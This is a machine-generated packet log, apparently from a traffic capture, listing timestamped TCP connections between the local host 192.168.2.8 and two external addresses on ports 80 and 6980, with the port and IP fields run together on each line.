                          Oct 1, 2024 07:38:15.164572954 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164578915 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164596081 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164606094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164613008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164623976 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164638042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164642096 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164659977 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164659977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164676905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164681911 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164696932 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164699078 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164711952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164724112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164736986 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164752007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164761066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164769888 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164788961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164793968 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164805889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164818048 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164824963 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164839029 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164855957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164864063 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164877892 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164884090 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164901972 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164908886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164921045 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164930105 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164937973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164942026 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164958000 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.164964914 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164983988 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.164984941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165002108 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165003061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165021896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165026903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165034056 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165050030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165066004 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165067911 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165086985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165091991 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165106058 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165110111 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165121078 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165123940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165142059 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165143013 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165159941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165160894 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165178061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165180922 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165194035 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165198088 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165215969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165218115 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165235043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165235996 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165249109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165252924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165270090 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165270090 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165287971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165287971 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165302038 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165306091 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165323019 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165328979 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165340900 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165343046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165358067 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165364981 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165378094 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.165380001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165401936 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.165416002 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401794910 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401819944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401835918 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401861906 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401878119 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401894093 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401896000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401909113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401923895 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401926994 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401941061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.401947021 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401962042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401988983 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.401988983 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402024984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402137995 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402159929 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402177095 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402189970 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402195930 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402199030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402204037 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402205944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402221918 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402230978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402235031 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402251005 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402256012 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402266979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402281046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402292967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402302980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402307987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402324915 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402333021 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402339935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402350903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402354002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402363062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402369022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402381897 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402390003 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402405024 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402430058 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402432919 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402453899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402455091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402455091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402463913 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402470112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402471066 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402484894 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402498960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402499914 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402513981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402515888 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402524948 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402529955 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402543068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402544975 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402555943 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402559996 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402575016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402575016 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402601004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402611017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402611017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402616978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402631044 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402633905 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402646065 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402650118 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402661085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402674913 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402676105 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402689934 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402690887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402704000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402708054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402721882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402724981 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402738094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402741909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402754068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402755976 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402779102 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402780056 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402795076 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402805090 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402808905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402817965 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402823925 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402836084 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402838945 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402852058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402853966 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402867079 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402868986 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402884007 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402885914 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402904034 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402905941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402913094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402924061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402937889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402940035 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402951956 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402956009 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402967930 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.402970076 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402985096 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.402997017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403000116 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403014898 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403021097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403031111 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403038979 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403047085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403063059 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403063059 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403074980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403078079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403093100 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403093100 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403107882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403120995 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403122902 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403134108 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403136969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403152943 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403160095 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403168917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403182030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403206110 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403256893 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403271914 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403291941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403307915 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403322935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403323889 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403331041 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403337955 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403352022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403362036 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403367043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403403044 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.403407097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403407097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.403417110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:26.469223976 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469237089 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469249010 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469283104 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469286919 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469299078 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469310045 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469337940 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469366074 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469563961 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469575882 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469594002 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469604015 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469614029 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469621897 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469624996 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469638109 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469647884 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469655037 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469659090 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469672918 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469682932 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469692945 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469692945 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469702005 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469707012 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469719887 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469727993 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469765902 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469795942 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.469981909 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.469993114 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470005035 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470036983 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.470062971 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470073938 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470108986 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.470171928 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470184088 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470194101 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.470218897 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.470243931 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.473656893 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.473668098 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.473678112 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.473812103 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474087000 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474102020 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474113941 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474123001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474136114 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474148035 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474174023 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474188089 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474191904 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474205017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474216938 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474227905 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474246025 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474246979 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474260092 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.474282980 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.474318981 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.517688036 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517854929 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517865896 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517884016 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517899990 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517913103 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517920017 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517925978 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517930031 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517936945 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517941952 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517946959 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.517955065 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.517982960 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518017054 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518027067 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518034935 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518047094 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518058062 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518078089 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518096924 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518174887 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518186092 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518197060 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518235922 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518240929 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518254995 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518255949 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518266916 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518280029 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518296957 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518318892 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518465042 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518476963 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518487930 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518498898 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518521070 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518532038 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518538952 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518543959 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518554926 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518567085 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518575907 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518590927 CEST497056980192.168.2.8194.37.97.150
                          Oct 1, 2024 07:38:26.518779993 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518791914 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518804073 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518821001 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518835068 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518846035 CEST698049705194.37.97.150192.168.2.8
                          Oct 1, 2024 07:38:26.518857002 CEST698049705194.37.97.150192.168.2.8
